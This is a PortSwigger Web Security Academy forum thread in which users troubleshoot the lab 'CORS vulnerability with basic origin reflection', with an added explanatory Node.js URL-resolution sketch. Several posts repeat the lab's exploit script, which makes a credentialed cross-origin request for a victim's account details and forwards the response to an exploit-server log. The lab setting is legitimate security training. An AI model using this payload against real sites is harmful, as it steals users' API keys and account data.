Burp Suite User Forum


Lab: CORS vulnerability with basic origin reflection not working

Todd | Last updated: Dec 21, 2022 04:58AM UTC

In this lab, I'm stuck on step 5 of the solution:

In the browser, go to the exploit server and enter the following HTML, replacing YOUR-LAB-ID with your unique lab URL:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

After replacing YOUR-LAB-ID with my lab ID, and then clicking View Exploit, the server appears to hang and I don't get a response. If I click Deliver Exploit to Victim, the server redirects me to the exploit server page.

Todd | Last updated: Dec 21, 2022 05:00AM UTC

Update: CORS lab 2 isn't working either.

Malinga | Last updated: Dec 21, 2022 12:17PM UTC

CORS labs are not working for me either.

Liam, PortSwigger Agent | Last updated: Dec 21, 2022 02:50PM UTC

Thanks for these reports, Todd and Malinga. Our tests are passing for our CORS labs. Do you have another machine/network to test this on?

Todd | Last updated: Dec 22, 2022 01:40AM UTC

Hi, yes, I tried Firefox and Chrome on Mac OS 64 bit ARM, Ubuntu Linux 64 bit ARM, and Windows 64 bit on Intel, from two different networks (different physical locations and IPs as well). Unfortunately the same result in each case. It's a head-scratcher.

Liam, PortSwigger Agent | Last updated: Dec 22, 2022 01:38PM UTC

Hi Todd. We've manually completed the lab today. The lab is also passing our automated testing.

Todd | Last updated: Dec 22, 2022 02:50PM UTC

Could you tell me which OS and browser you're using? Then I can try that combo and see if I can recreate the problem. I know these problems are hard to track down -- it's part of my job too, so I understand. Thanks.

Todd | Last updated: Dec 22, 2022 02:54PM UTC

I tried it again this morning and the key is not in the URL as described in the lab. Here's what I see: https://<redacted>.exploit-server.net/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

Liam, PortSwigger Agent | Last updated: Dec 23, 2022 09:49AM UTC

Thanks, Todd. We'll look into this again. However, it is likely to be after the holidays.

Todd | Last updated: Dec 28, 2022 04:18AM UTC

SOLVED

The text 'YOUR-LAB-ID' in the lab's solution is not completely correct. Taken literally, this value is just '<random number>.web-security-academy.net'. However, the prefix needs to be included in that string for the call to req.open() to work, so the parameter must actually be 'https://<random number>.web-security-academy.net'.

This solution is clearer:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>
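
Added example, not part of any post in this thread and not PortSwigger's code: the URL resolution behind the "Resource not found - Academy Exploit Server" value reported above. `XMLHttpRequest.open()` resolves its URL argument against the page running the script, so a value without a scheme becomes a relative path on the exploit server itself. The sketch uses Node's WHATWG `URL` class for that step; the hostnames and function names are constructed for illustration.

```javascript
// Constructed page URL standing in for the exploit server page that runs the script.
const EXPLOIT_PAGE = 'https://exploit-example.exploit-server.net/exploit';

// Resolve the argument given to req.open() the way the browser does:
// parse it relative to the URL of the document that contains the script.
function resolveTarget(urlArg, pageUrl = EXPLOIT_PAGE) {
  const page = new URL(pageUrl);
  const target = new URL(urlArg, page);
  return {
    href: target.href,
    // Only a different scheme/host/port makes this a cross-origin request.
    crossOrigin: target.origin !== page.origin,
  };
}

// Human-readable verdict for one candidate argument.
function explain(urlArg, pageUrl = EXPLOIT_PAGE) {
  const { href, crossOrigin } = resolveTarget(urlArg, pageUrl);
  return crossOrigin
    ? `cross-origin: ${href} (the lab's CORS headers decide if the response is readable)`
    : `same-origin: ${href} (request never leaves the exploit server)`;
}

// Constructed inputs mirroring the variants tried in the thread.
const samples = [
  'lab-example.web-security-academy.net/accountDetails',          // no scheme
  'https://lab-example.web-security-academy.net/accountDetails',  // absolute URL
  'Https://lab-example.web-security-academy.net/accountDetails',  // scheme is case-insensitive
  '//lab-example.web-security-academy.net/accountDetails',        // scheme-relative
];

for (const s of samples) {
  console.log(`${s}\n  -> ${explain(s)}`);
}
```

The first sample resolves to a path on the exploit server, which has no such resource, so the response body that ends up in `/log?key=` is that server's own error text rather than the account details.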

Kavitha | Last updated: May 18, 2023 09:42PM UTC

Your Script didn't work for me Todd

Ben, PortSwigger Agent | Last updated: May 19, 2023 06:36AM UTC

Hi Kavitha,

Can you provide some details of the steps that you are taking to try and solve this lab so that we can assist you further?

Joe | Last updated: Jun 17, 2023 05:16PM UTC

Didn't work for me either Todd

Damian | Last updated: Jul 07, 2023 12:09PM UTC

Still it doesn't work!

Michelle, PortSwigger Agent | Last updated: Jul 07, 2023 12:47PM UTC

Is there a specific CORS lab you're having issues with, or more than one? Can you please tell us more about the problems you're seeing and at what stage of the lab they occur?

Gareth | Last updated: Sep 04, 2023 08:20AM UTC

Hi all,

I am having the same issue with this lab:

Lab: CORS vulnerability with basic origin reflection

When I enter the JS with my Lab Url, I either receive a page full of GET/POST requests or a blank screen.

"GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

I have tried without the 'https://' and with 'Https://'.

Any ideas?

Thanks

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 10:32AM UTC

Hi,

In step 6, when you view the exploit, you will see the access logs for the exploit server on the main page, but if you check the URL that you have visited in the main URL bar, you should see the additional information.

I hope this helps. You might also find it useful to follow along with the community solution video.

Ben | Last updated: Mar 09, 2024 01:35AM UTC

Hi, I'm having a similar issue as above, but don't know how to fix this. I have tried it on multiple browsers. My script is

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','0a57002f03f4f14e83638cfb00c90073.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

and where the API key WOULD be, there is "GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server, this is also in my URL. How do I fix this? I have tried my own browser, the Burp Chromium, Chrome and all not working.

Michelle, PortSwigger Agent | Last updated: Mar 11, 2024 11:20AM UTC

Hi,

If you add https:// to the URL for your lab and deliver the exploit to the victim, do you see the victim visiting the exploit server?

Pedro | Last updated: Mar 14, 2024 02:26PM UTC

Hello, I am also having this problem. I have tried to follow the solutions step by step, but when I try to view the exploit, it says "Cross-Origin Request Blocked". Here is my script:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0ac2006d036c63208096851200950026.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

I tried it on Firefox and Burp Chromium and neither have worked. Am I missing something? Thank you.

Michelle, PortSwigger Agent | Last updated: Mar 14, 2024 03:24PM UTC

Hi,

If you deliver the exploit to the victim and then view the access logs for the exploit server, do you see the victim visiting the exploit server at all?

Pedro | Last updated: Mar 14, 2024 04:20PM UTC

I'm pretty sure, according to this line from the log:

10.0.3.181 2024-03-14 16:17:12 +0000 "GET /exploit/ HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

Michelle, PortSwigger Agent | Last updated: Mar 14, 2024 04:21PM UTC

Were there any other lines from that source IP in the logs?

Pedro | Last updated: Mar 14, 2024 04:25PM UTC

No, this was the only one

Michelle, PortSwigger Agent | Last updated: Mar 15, 2024 11:13AM UTC

Hi,

Thanks for checking. I've just tested delivering the exploit to the victim and saw 3 entries in the access log from the victim's IP. I used the following script on the exploit server:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://<lab-id>.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

Can you give this another go and let me know what you see? If you're still having issues, can you send some screenshots or a screen recording of the steps you're taking and what you see to support@portswigger.net, please?

Pedro | Last updated: Mar 15, 2024 02:31PM UTC

Hello, I've tried it again and it worked. I have no idea what happened but thanks anyway! :)
